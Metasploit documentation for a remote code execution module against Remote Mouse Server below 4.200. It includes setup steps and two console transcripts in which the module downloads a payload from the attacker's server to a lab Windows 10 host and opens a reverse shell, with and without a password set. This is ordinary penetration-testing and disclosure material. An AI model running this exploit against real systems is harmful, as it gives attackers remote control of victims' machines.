## Vulnerable Application

This module utilizes the Remote Mouse Server by Emote Interactive protocol
to deploy a payload and run it from the server on versions < 4.200 (500 server response).
This module will deploy
a payload regardless if server authentication is required.
Tested against 4.110, current at the time of module writing

Version 4.110 can be downloaded from
(unofficial site)[https://remote-mouse.en.uptodown.com/windows/download/4546712]
    
## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/windows/misc/remote_mouse_rce`
4. Set `rhost` and `lhost` as required.
5. Do: `run`
6. You should get a shell as the user who is running Remote Mouse.

## Options

### SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen.
Defaults to `1`.

### PATH

The path where the payload should be downloaded/staged to. Defaults to `c:\\Windows\\Temp\\`.

## Scenarios

###  Remote Mouse 4.110 on Windows 10

```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > run

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49962) at 2022-09-27 16:33:02 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\NADYvmtxr.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>whoami 
whoami
win10prolicense\windows

C:\Users\windows>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
```

###  Remote Mouse 4.110 on Windows 10, with a password


```
resource (remote_mouse.rb)> use exploits/windows/misc/remote_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (remote_mouse.rb)> set rhosts 192.168.2.95
rhosts => 192.168.2.95
resource (remote_mouse.rb)> set lhost 192.168.2.199
lhost => 192.168.2.199
resource (remote_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/remote_mouse_rce) > exploit

[*] Started reverse TCP handler on 192.168.2.199:4444 
[*] 192.168.2.95:1978 - Running automatic check ("set AutoCheck false" to disable)
[+] 192.168.2.95:1978 - The target appears to be vulnerable. Received handshake with version: 411
[*] 192.168.2.95:1978 - Connecting
[*] 192.168.2.95:1978 - Sending Windows key
[*] 192.168.2.95:1978 - Opening command prompt
[*] 192.168.2.95:1978 - Sending stager
[*] 192.168.2.95:1978 - Using URL: http://192.168.2.199:8080/
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[+] 192.168.2.95:1978 - Payload request received, sending 73802 bytes of payload for staging
[*] 192.168.2.95:1978 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.2.95
[*] Command shell session 1 opened (192.168.2.199:4444 -> 192.168.2.95:49975) at 2022-09-27 16:36:09 -0400
[*] 192.168.2.95:1978 - Server stopped.
[!] 192.168.2.95:1978 - This exploit may require manual cleanup of 'c:\Windows\Temp\86a4GsbpomvEgUS.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Users\windows>
```
